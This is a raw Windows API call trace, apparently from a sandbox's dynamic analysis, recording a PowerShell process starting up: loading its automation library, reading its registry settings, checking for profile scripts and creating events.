	[0611.659] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0611.660] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0611.660] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0611.660] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0611.660] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0611.661] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0611.661] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0611.661] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0611.661] GetCurrentProcessId () returned 0xefc
	[0611.663] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0611.663] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0611.663] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0611.664] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0611.664] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0611.664] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0611.665] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0611.665] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0611.665] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0611.665] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0611.666] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0611.666] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0611.666] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xad6f8 | out: phkResult=0xad6f8*=0x380) returned 0x0
	[0611.666] RegQueryValueExW (in: hKey=0x380, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xad67c, lpData=0x0, lpcbData=0xad678*=0x0 | out: lpType=0xad67c*=0x1, lpData=0x0, lpcbData=0xad678*=0x56) returned 0x0
	[0611.666] CoTaskMemAlloc (cb=0x5a) returned 0x1b765930
	[0611.666] RegQueryValueExW (in: hKey=0x380, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xad64c, lpData=0x1b765930, lpcbData=0xad648*=0x56 | out: lpType=0xad64c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xad648*=0x56) returned 0x0
	[0611.667] CoTaskMemFree (pv=0x1b765930) 
	[0611.667] RegCloseKey (hKey=0x380) returned 0x0
	[0611.669] CoTaskMemAlloc (cb=0x104) returned 0x20da70
	[0611.669] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20da70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0611.669] CoTaskMemFree (pv=0x20da70) 
	[0613.724] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0613.724] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0613.724] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0613.725] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0613.725] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0613.725] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0613.725] VirtualQuery (in: lpAddress=0xab750, lpBuffer=0xac610, dwLength=0x30 | out: lpBuffer=0xac610*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0613.730] CoTaskMemAlloc (cb=0x104) returned 0x20da70
	[0613.730] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20da70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0613.730] CoTaskMemFree (pv=0x20da70) 
	[0613.746] CoTaskMemAlloc (cb=0x104) returned 0x20da70
	[0613.746] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20da70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0613.746] CoTaskMemFree (pv=0x20da70) 
	[0613.747] CoTaskMemAlloc (cb=0x104) returned 0x20da70
	[0613.747] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20da70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0613.747] CoTaskMemFree (pv=0x20da70) 
	[0613.747] CoTaskMemAlloc (cb=0x104) returned 0x20da70
	[0613.747] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20da70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0613.747] CoTaskMemFree (pv=0x20da70) 
	[0614.848] CoTaskMemAlloc (cb=0x104) returned 0x20da70
	[0614.848] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20da70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0614.848] CoTaskMemFree (pv=0x20da70) 
	[0614.854] CoTaskMemAlloc (cb=0x104) returned 0x20da70
	[0614.854] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20da70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0614.854] CoTaskMemFree (pv=0x20da70) 
	[0614.856] CoTaskMemAlloc (cb=0x104) returned 0x20da70
	[0614.856] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20da70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0614.856] CoTaskMemFree (pv=0x20da70) 
	[0614.863] VirtualQuery (in: lpAddress=0xab750, lpBuffer=0xac610, dwLength=0x30 | out: lpBuffer=0xac610*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0616.317] VirtualQuery (in: lpAddress=0xab750, lpBuffer=0xac610, dwLength=0x30 | out: lpBuffer=0xac610*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0616.326] CoTaskMemAlloc (cb=0x104) returned 0x20da70
	[0616.326] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20da70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0616.326] CoTaskMemFree (pv=0x20da70) 
	[0617.758] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x20deb0
	[0617.758] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x20dfc0
	[0624.063] CoTaskMemAlloc (cb=0x104) returned 0x20e0d0
	[0624.063] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20e0d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0624.063] CoTaskMemFree (pv=0x20e0d0) 
	[0625.089] CoTaskMemAlloc (cb=0x104) returned 0x20e0d0
	[0625.089] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20e0d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0625.089] CoTaskMemFree (pv=0x20e0d0) 
	[0626.043] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0626.044] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0626.044] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0626.044] VirtualQuery (in: lpAddress=0xaba00, lpBuffer=0xac8c0, dwLength=0x30 | out: lpBuffer=0xac8c0*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0626.050] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xad858 | out: phkResult=0xad858*=0x38c) returned 0x0
	[0626.050] RegQueryValueExW (in: hKey=0x38c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xad7dc, lpData=0x0, lpcbData=0xad7d8*=0x0 | out: lpType=0xad7dc*=0x1, lpData=0x0, lpcbData=0xad7d8*=0x56) returned 0x0
	[0626.051] CoTaskMemAlloc (cb=0x5a) returned 0x1b78b1c0
	[0626.051] RegQueryValueExW (in: hKey=0x38c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xad7ac, lpData=0x1b78b1c0, lpcbData=0xad7a8*=0x56 | out: lpType=0xad7ac*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xad7a8*=0x56) returned 0x0
	[0626.051] CoTaskMemFree (pv=0x1b78b1c0) 
	[0626.051] RegCloseKey (hKey=0x38c) returned 0x0
	[0626.051] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xad858 | out: phkResult=0xad858*=0x38c) returned 0x0
	[0626.051] RegQueryValueExW (in: hKey=0x38c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xad7dc, lpData=0x0, lpcbData=0xad7d8*=0x0 | out: lpType=0xad7dc*=0x1, lpData=0x0, lpcbData=0xad7d8*=0x56) returned 0x0
	[0626.051] CoTaskMemAlloc (cb=0x5a) returned 0x1b78b1c0
	[0626.051] RegQueryValueExW (in: hKey=0x38c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xad7ac, lpData=0x1b78b1c0, lpcbData=0xad7a8*=0x56 | out: lpType=0xad7ac*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xad7a8*=0x56) returned 0x0
	[0626.051] CoTaskMemFree (pv=0x1b78b1c0) 
	[0626.051] RegCloseKey (hKey=0x38c) returned 0x0
	[0626.055] CoTaskMemAlloc (cb=0x20c) returned 0x1b754970
	[0626.055] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b754970 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0626.055] CoTaskMemFree (pv=0x1b754970) 
	[0626.055] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0xad410, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0626.055] CoTaskMemAlloc (cb=0x20c) returned 0x1b754970
	[0626.055] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b754970 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0626.055] CoTaskMemFree (pv=0x1b754970) 
	[0626.055] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0xad410, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0626.056] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0xad5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36
	[0626.056] SetErrorMode (uMode=0x1) returned 0x1
	[0626.056] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0xad7c0 | out: lpFileInformation=0xad7c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0626.056] SetErrorMode (uMode=0x1) returned 0x1
	[0626.056] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0xad5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b
	[0626.056] SetErrorMode (uMode=0x1) returned 0x1
	[0626.057] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0xad7c0 | out: lpFileInformation=0xad7c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0626.057] SetErrorMode (uMode=0x1) returned 0x1
	[0626.057] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0xad5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x45
	[0626.057] SetErrorMode (uMode=0x1) returned 0x1
	[0626.057] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0xad7c0 | out: lpFileInformation=0xad7c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0626.057] SetErrorMode (uMode=0x1) returned 0x1
	[0626.057] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0xad5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x5a
	[0626.057] SetErrorMode (uMode=0x1) returned 0x1
	[0626.057] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0xad7c0 | out: lpFileInformation=0xad7c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0626.058] SetErrorMode (uMode=0x1) returned 0x1
	[0626.058] CoTaskMemAlloc (cb=0x104) returned 0x20e0d0
	[0626.058] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20e0d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0626.058] CoTaskMemFree (pv=0x20e0d0) 
	[0626.058] CoTaskMemAlloc (cb=0x104) returned 0x20e0d0
	[0626.059] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20e0d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0626.059] CoTaskMemFree (pv=0x20e0d0) 
	[0626.059] CoTaskMemAlloc (cb=0x104) returned 0x20e0d0
	[0626.059] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20e0d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0626.059] CoTaskMemFree (pv=0x20e0d0) 
	[0626.060] CoTaskMemAlloc (cb=0x104) returned 0x20e0d0
	[0626.060] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20e0d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0626.060] CoTaskMemFree (pv=0x20e0d0) 
	[0626.891] CoTaskMemAlloc (cb=0x104) returned 0x20e0d0
	[0626.891] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20e0d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0626.891] CoTaskMemFree (pv=0x20e0d0) 
	[0626.893] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x38c
	[0626.893] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x324
	[0626.893] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x2f4
	[0626.893] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x2f8
	[0626.893] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x2fc
	[0626.894] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x310
	[0626.894] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x328
	[0626.894] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x32c
	[0626.894] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x330
	[0626.894] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x390
	[0626.894] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x340
	[0626.894] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x344
	[0626.896] CoTaskMemAlloc (cb=0x104) returned 0x20e0d0
	[0626.896] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20e0d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0626.897] CoTaskMemFree (pv=0x20e0d0) 
	[0626.899] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
